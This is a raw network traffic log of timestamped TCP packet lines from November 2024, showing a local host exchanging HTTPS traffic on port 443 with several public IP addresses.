Nov 25, 2024 11:34:19.176142931 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.197495937 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.197541952 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.197566032 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.197571993 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.197588921 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.197603941 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.218847036 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.218892097 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.218911886 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.218923092 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.218938112 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.218971968 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.240190983 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.240236044 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.240255117 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.240261078 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.240287066 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.240308046 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.361140013 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.361196041 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.361224890 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.361238003 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.361251116 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.361278057 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.374917030 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.374939919 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.374974012 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.374979019 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.375020981 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.390856981 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.390922070 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.390928030 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.390949965 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.390978098 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.391000032 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.406424999 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.406469107 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.406497002 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.406503916 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.406546116 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.406564951 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.421168089 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.421226978 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.421240091 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.421253920 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.421281099 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.421310902 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.432439089 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.432482958 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.432512045 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.432517052 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.432547092 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.432573080 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.432576895 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.432617903 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.432646990 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.432688951 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.432729959 CET	49986	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.432743073 CET	443	49986	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.442747116 CET	443	49990	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:19.442997932 CET	49990	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:19.443006039 CET	443	49990	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:19.443360090 CET	443	49990	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:19.443689108 CET	49990	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:19.443749905 CET	443	49990	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:19.443857908 CET	49990	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:19.443895102 CET	49990	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:19.443928003 CET	443	49990	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:19.562809944 CET	443	49987	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:19.562829018 CET	443	49987	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:19.562877893 CET	49987	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:19.562901020 CET	443	49987	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:19.562915087 CET	443	49987	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:19.562963009 CET	49987	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:19.564055920 CET	49987	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:19.564066887 CET	443	49987	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:19.564078093 CET	49987	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:19.564081907 CET	443	49987	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:19.599344969 CET	49999	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:19.599380970 CET	443	49999	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:19.599441051 CET	49999	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:19.599600077 CET	49999	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:19.599620104 CET	443	49999	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:19.783365965 CET	443	49892	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:19.783430099 CET	443	49892	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:19.783477068 CET	49892	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:19.808032990 CET	443	49893	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:19.808115959 CET	443	49893	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:19.808168888 CET	49893	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:19.819822073 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.819837093 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.819911957 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.820482016 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:19.820496082 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:19.872064114 CET	443	49989	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:19.872287035 CET	443	49989	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:19.872342110 CET	49989	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:19.872756004 CET	49989	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:19.872767925 CET	443	49989	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:19.872776985 CET	49989	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:19.872808933 CET	49989	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:19.883383036 CET	443	49991	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:19.884336948 CET	49991	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:19.884345055 CET	443	49991	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:19.885302067 CET	49991	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:19.885307074 CET	443	49991	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:19.951353073 CET	443	49993	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:19.951745987 CET	49993	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:19.951762915 CET	443	49993	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:19.952362061 CET	49993	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:19.952367067 CET	443	49993	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:19.962469101 CET	443	49992	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:19.962706089 CET	49992	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:19.962718010 CET	443	49992	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:19.963597059 CET	443	49992	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:19.963665009 CET	49992	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:19.963948965 CET	49992	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:19.964001894 CET	443	49992	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:19.964123011 CET	49992	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:19.964129925 CET	443	49992	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:19.964159966 CET	49992	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:19.964186907 CET	443	49992	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:20.008100033 CET	49992	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.032339096 CET	443	49990	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:20.032531977 CET	443	49990	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:20.032594919 CET	49990	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.032952070 CET	49990	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.032977104 CET	443	49990	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:20.032989025 CET	49990	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.033023119 CET	49990	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.086803913 CET	443	49998	23.1.237.91	192.168.2.5
Nov 25, 2024 11:34:20.086879015 CET	49998	443	192.168.2.5	23.1.237.91
Nov 25, 2024 11:34:20.096196890 CET	443	49996	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.097134113 CET	49996	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.097134113 CET	49996	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.097157001 CET	443	49996	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.097165108 CET	443	49996	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.120584011 CET	443	49994	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.120929003 CET	49994	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.120944023 CET	443	49994	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.121341944 CET	49994	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.121345997 CET	443	49994	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.145904064 CET	443	49997	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:20.146133900 CET	49997	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.146148920 CET	443	49997	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:20.147603035 CET	443	49997	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:20.147689104 CET	49997	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.148629904 CET	49997	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.148713112 CET	443	49997	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:20.149569988 CET	49997	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.149667025 CET	49997	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.149688959 CET	443	49997	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:20.150549889 CET	443	49995	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.151655912 CET	49995	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.151673079 CET	443	49995	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.154129982 CET	49995	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.154134989 CET	443	49995	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.176086903 CET	443	49895	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:20.176152945 CET	443	49895	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:20.176496983 CET	49895	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:20.195638895 CET	49997	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.205245018 CET	443	49896	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:20.205297947 CET	443	49896	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:20.205610037 CET	49896	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:20.210269928 CET	443	49898	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:20.210323095 CET	443	49898	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:20.210407972 CET	49898	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:20.246428013 CET	443	49897	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:20.246480942 CET	443	49897	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:20.246576071 CET	49897	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:20.319890976 CET	443	49991	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.319963932 CET	443	49991	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.322094917 CET	49991	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.322094917 CET	49991	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.322189093 CET	49991	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.322195053 CET	443	49991	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.325320959 CET	50001	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.325331926 CET	443	50001	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.325465918 CET	50001	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.326186895 CET	50001	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.326199055 CET	443	50001	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.495012045 CET	443	49993	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.495171070 CET	443	49993	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.495371103 CET	49993	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.495371103 CET	49993	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.495934963 CET	49993	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.495942116 CET	443	49993	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.498277903 CET	50002	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.498286009 CET	443	50002	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.498485088 CET	50002	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.498485088 CET	50002	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.498503923 CET	443	50002	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.501775026 CET	443	49900	162.159.61.3	192.168.2.5
Nov 25, 2024 11:34:20.501929045 CET	443	49900	162.159.61.3	192.168.2.5
Nov 25, 2024 11:34:20.501987934 CET	49900	443	192.168.2.5	162.159.61.3
Nov 25, 2024 11:34:20.734466076 CET	443	49988	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:20.734488964 CET	443	49988	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:20.734528065 CET	443	49988	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:20.734560013 CET	49988	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:20.734570026 CET	443	49988	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:20.734601974 CET	443	49899	162.159.61.3	192.168.2.5
Nov 25, 2024 11:34:20.734615088 CET	443	49988	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:20.734618902 CET	49988	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:20.734682083 CET	443	49899	162.159.61.3	192.168.2.5
Nov 25, 2024 11:34:20.734699965 CET	49988	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:20.734731913 CET	443	49992	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:20.734814882 CET	443	49992	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:20.734823942 CET	49899	443	192.168.2.5	162.159.61.3
Nov 25, 2024 11:34:20.734910965 CET	49992	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.735291004 CET	49992	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.735291004 CET	49992	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.735304117 CET	443	49992	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:20.735466003 CET	49992	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.735486031 CET	443	49996	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.735517979 CET	443	49996	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.735562086 CET	443	49996	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.735574007 CET	443	49994	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.735589981 CET	49996	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.735599995 CET	443	49994	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.735624075 CET	49996	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.735637903 CET	443	49994	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.735657930 CET	49994	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.735874891 CET	443	49995	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.736066103 CET	443	49995	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.736093044 CET	49994	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.737358093 CET	49988	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:20.737360954 CET	49995	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.737364054 CET	443	49988	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:20.737389088 CET	49988	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:20.737392902 CET	443	49988	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:20.740710974 CET	49996	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.740710974 CET	49996	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.740729094 CET	443	49996	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.740739107 CET	443	49996	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.741883993 CET	49994	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.741889954 CET	443	49994	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.741921902 CET	49994	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.741928101 CET	443	49994	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.742897987 CET	49995	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.742906094 CET	443	49995	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.742930889 CET	49995	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.742934942 CET	443	49995	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.747668028 CET	443	49997	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:20.747787952 CET	443	49997	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:20.747869015 CET	49997	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.751343966 CET	50003	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.751357079 CET	443	50003	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.751971006 CET	49997	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:20.751981020 CET	443	49997	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:20.752063036 CET	50003	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.752342939 CET	50004	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.752355099 CET	443	50004	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.754025936 CET	50004	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.755042076 CET	50003	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.755042076 CET	50004	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.755053997 CET	443	50003	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.755059958 CET	443	50004	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.755354881 CET	50005	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.755384922 CET	443	50005	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.755527020 CET	50005	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.755527020 CET	50005	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:20.755548954 CET	443	50005	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:20.845510006 CET	50006	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:20.845524073 CET	443	50006	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:20.845726013 CET	50006	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:20.845726013 CET	50006	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:20.845752001 CET	443	50006	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:21.261054039 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:21.262531042 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:21.262919903 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:21.262927055 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:21.264555931 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:21.264560938 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:21.364983082 CET	443	49999	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:21.367002010 CET	49999	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:21.367034912 CET	443	49999	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:21.377969027 CET	49999	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:21.377976894 CET	443	49999	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:21.378007889 CET	49999	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:21.378019094 CET	443	49999	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:22.156721115 CET	443	49999	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:22.156745911 CET	443	49999	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:22.156831026 CET	443	49999	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:22.156893969 CET	49999	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:22.157319069 CET	49999	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:22.157344103 CET	443	49999	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:22.157358885 CET	49999	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:22.157366991 CET	443	49999	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:22.160393953 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.160417080 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.160433054 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.160473108 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.160495996 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.160515070 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.160521030 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.160535097 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.160547018 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.160566092 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.190409899 CET	50007	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:22.190457106 CET	443	50007	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:22.190531969 CET	50007	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:22.190716982 CET	50007	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:22.190727949 CET	443	50007	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:22.220376968 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.220407009 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.220477104 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.220500946 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.220523119 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.220629930 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.321944952 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.321968079 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.322021961 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.322048903 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.322062969 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.322129965 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.402724028 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.402750969 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.402805090 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.402829885 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.402847052 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.403043985 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.416263103 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.416321993 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.416379929 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.416507959 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.416507959 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.550870895 CET	443	50002	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.555877924 CET	50002	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:22.555903912 CET	443	50002	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.556541920 CET	50002	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:22.556549072 CET	443	50002	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.616919994 CET	443	50006	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:22.619864941 CET	50006	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:22.619880915 CET	443	50006	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:22.620594025 CET	50006	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:22.620600939 CET	443	50006	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:22.620645046 CET	50006	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:22.620655060 CET	443	50006	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:22.666336060 CET	443	50005	13.107.246.63	192.168.2.5
